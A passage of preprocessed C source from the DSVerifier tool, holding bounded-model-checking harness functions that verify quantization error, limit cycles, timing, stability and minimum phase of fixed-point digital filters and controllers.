# 69 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
double yf[X_SIZE_VALUE];
double xf[X_SIZE_VALUE];
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
double yfaux[ds.a_size];
double xfaux[ds.b_size];
double wfaux[Nw];
int i;
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
yfaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
xfaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
wfaux[i] = 0;
}
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
yf[i] = 0.0f;
xf[i] = fxp_to_double(x[i]);
}
for (i = 0; i < X_SIZE_VALUE; ++i) {
# 156 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
y[i] = fxp_transposed_direct_form_2(waux, x[i], a_fxp, b_fxp, ds.a_size, ds.b_size);
yf[i] = double_transposed_direct_form_2(wfaux, xf[i], ds.a, ds.b, ds.a_size, ds.b_size);
# 169 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
double absolute_error = yf[i] - fxp_to_double(y[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 35 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 1
# 13 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
int verify_zero_input_limit_cycle(void){
overflow_mode = 3;
int i,j;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
((void) sizeof ((
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ; else __assert_fail (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
"X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na"
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h", 23, __extension__ __PRETTY_FUNCTION__); }))
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 71 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = 0;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
fxp_t y0[ds.a_size];
fxp_t w0[Nw];
# 104 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
for (i = 0; i < Nw; ++i) {
waux[i] = nondet_int();
__DSVERIFIER_assume(waux[i] >= min_fxp && waux[i] <= max_fxp);
w0[i] = waux[i];
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
for(i=0; i<X_SIZE_VALUE; ++i){
# 141 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
y[i] = fxp_transposed_direct_form_2(waux, x[i], a_fxp, b_fxp, ds.a_size, ds.b_size);
# 188 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
extern hardware hw;
int generic_timer = 0;
int verify_generic_timing(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
double initial_timer = generic_timer;
for (i = 0; i < X_SIZE_VALUE; ++i) {
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.adiw) + (2 * hw.assembly.std));
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.cpi) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
# 85 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
y[i] = generic_timing_double_transposed_direct_form_2(waux, x[i], ds.a, ds.b, ds.a_size, ds.b_size);
double spent_time = (((double) generic_timer) * hw.cycle);
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
((void) sizeof ((
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ; else __assert_fail (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
"spent_time <= ds.sample_time"
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h", 89, __extension__ __PRETTY_FUNCTION__); }))
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
;
generic_timer = initial_timer;
}
return 0;
}
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_timing_msp_430(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
# 75 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
y[i] = double_transposed_direct_form_2_MSP430(waux, x[i], ds.a, ds.b, ds.a_size, ds.b_size);
# 121 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
}
return 0;
}
# 38 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
extern digital_system ds;
extern implementation impl;
int verify_stability(void){
overflow_mode = 0;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
((void) sizeof ((
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ; else __assert_fail (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
"check_stability(_a, ds.a_size)"
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h", 37, __extension__ __PRETTY_FUNCTION__); }))
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
;
# 83 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
return 0;
}
# 39 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
extern digital_system ds;
extern implementation impl;
int verify_minimum_phase(void){
overflow_mode = 0;
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
__DSVERIFIER_assert(check_stability(_b, ds.b_size));
# 85 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
return 0;
}
# 40 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_stability_closedloop_using_dslib(void){
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 68 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
printf("Verifying stability for closedloop function\n");
__DSVERIFIER_assert(check_stability_closedloop(ans_den, ans_den_size, p_num, p_num_size, p_den, p_den_size));
return 0;
}
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
double nondet_double();
int verify_limit_cycle_closed_loop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 58 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
int i;
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux[i] = nondet_constant_input;
}
double yaux[ans_den_size];
double y0[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux[Nw];
double w0[Nw];
# 105 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
for (i = 0; i < Nw; ++i) {
waux[i] = nondet_int();
__DSVERIFIER_assume(waux[i] >= impl.min && waux[i] <= impl.max);
w0[i] = waux[i];
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
y[i] = double_transposed_direct_form_2(waux, x[i], ans_den, ans_num, ans_den_size, ans_num_size);
}
double_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 42 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_error_closedloop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 56 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num_double[100];
double ans_num_qtz[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den_qtz[100];
double ans_den_double[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 77 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
int i;
double y_qtz[X_SIZE_VALUE];
double y_double[X_SIZE_VALUE];
double x_qtz[X_SIZE_VALUE];
double x_double[X_SIZE_VALUE];
double xaux_qtz[ans_num_size];
double xaux_double[ans_num_size];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x_qtz[i] = nondet_constant_input;
x_double[i] = nondet_constant_input;
y_qtz[i] = 0;
y_double[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux_qtz[i] = nondet_constant_input;
xaux_double[i] = nondet_constant_input;
}
double yaux_qtz[ans_den_size];
double yaux_double[ans_den_size];
double y0_qtz[ans_den_size];
double y0_double[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux_qtz[Nw];
double waux_double[Nw];
double w0_qtz[Nw];
double w0_double[Nw];
for (i = 0; i < Nw; ++i) {
waux_qtz[i] = 0;
waux_double[i] = 0;
}
for(i=0; i<X_SIZE_VALUE; ++i){
# 150 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
y_qtz[i] = double_transposed_direct_form_2(waux_qtz, x_qtz[i], ans_den_qtz, ans_num_qtz, ans_den_size, ans_num_size);
y_double[i] = double_transposed_direct_form_2(waux_double, x_double[i], ans_den_double, ans_num_double, ans_den_size, ans_num_size);
double absolute_error = y_double[i] - fxp_to_double(y_qtz[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 43 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double new_state[4][4];
double new_stateFWL[4][4];
digital_system_state_space _controller_fxp;
digital_system_state_space _controller_double;
double ss_system_quantization_error(fxp_t inputs){
digital_system_state_space __backupController;
int i;
int j;
_controller.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
__backupController.A[i][j]= (_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
__backupController.B[i][j]= (_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
__backupController.C[i][j]= (_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
__backupController.D[i][j]= (_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
__backupController.states[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
__backupController.inputs[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
__backupController.outputs[i][j]= (_controller.outputs[i][j]);
}
}
double __quant_error = 0.0;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_state[i][j]);
}
}
double output_double = double_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
__backupController.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
_controller.A[i][j] = __backupController.A[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
_controller.B[i][j] = __backupController.B[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
_controller.C[i][j] = __backupController.C[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
_controller.D[i][j] = __backupController.D[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j] = __backupController.states[i][j];
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
_controller.inputs[i][j] = __backupController.inputs[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j] = __backupController.outputs[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_stateFWL[i][j]);
}
}
double output_fxp = fxp_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
__quant_error = output_double - output_fxp;
return __quant_error;
}
double fxp_ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double temp_result1[4][4];
double result2[4][4];
double temp_states[4][4];
fxp_t K_fxp[4][4];
fxp_t states_fxp[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_fxp.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
reference_aux[i][j]=0;
K_fxp[i][j] = 0;
}
}
for(i=0; i<nInputs;i++){
reference_aux[i][0]= reference;
}
for(i=0; i<4;i++){
states_fxp[i][0]=0;
}
for(i=0; i<nStates;i++){
K_fxp[0][i]= fxp_double_to_fxp(_controller_fxp.K[0][i]);
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for(k=0; k<nStates;k++)
{
states_fxp[k][0]= fxp_double_to_fxp(_controller_fxp.states[k][0]);
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,K_fxp,states_fxp,result_fxp);
fxp_t reference_fxp[4][4];
fxp_t result_fxp2[4][4];
for(k=0;k<nInputs;k++)
{
reference_fxp[k][0] =fxp_double_to_fxp(fxp_quantize(reference_aux[k][0]));
}
fxp_sub_matrix(nInputs,1, reference_fxp, result_fxp, result_fxp2);
for(k=0; k<nInputs;k++)
{
_controller_fxp.inputs[k][0] = fxp_to_double(fxp_quantize(result_fxp2[k][0]));
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_fxp.C,_controller_fxp.states,result1);
if(flag == 1)
{
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_fxp.D,_controller_fxp.inputs,result2);
}
double_add_matrix(nOutputs,1,result1,result2,_controller_fxp.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_fxp.A,_controller_fxp.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_fxp.B,_controller_fxp.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_fxp.states);
return _controller_fxp.outputs[0][0];
}
double ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double result2[4][4];
unsigned int i;
unsigned int j;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_double.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference_aux[i][j]= reference;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.K,_controller_double.states,result1);
double_sub_matrix(nInputs,1,reference_aux,result1, _controller_double.inputs);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.C,_controller_double.states,result1);
if(flag == 1)
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_double.D,_controller_double.inputs,result2);
double_add_matrix(nOutputs,1,result1,result2,_controller_double.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_double.A,_controller_double.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_double.B,_controller_double.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_double.states);
return _controller_double.outputs[0][0];
}
int verify_error_state_space(void){
int i,j;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
_controller_fxp = _controller;
_controller_double = _controller;
overflow_mode = 0;
fxp_t x[0];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < 0; ++i) {
x[i] = nondet_constant_input;
}
double __quant_error;
if(closed_loop){
for (i = 0; i < 0; ++i) {
__quant_error = ss_closed_loop_quantization_error(x[i]) - fxp_ss_closed_loop_quantization_error(x[i]);
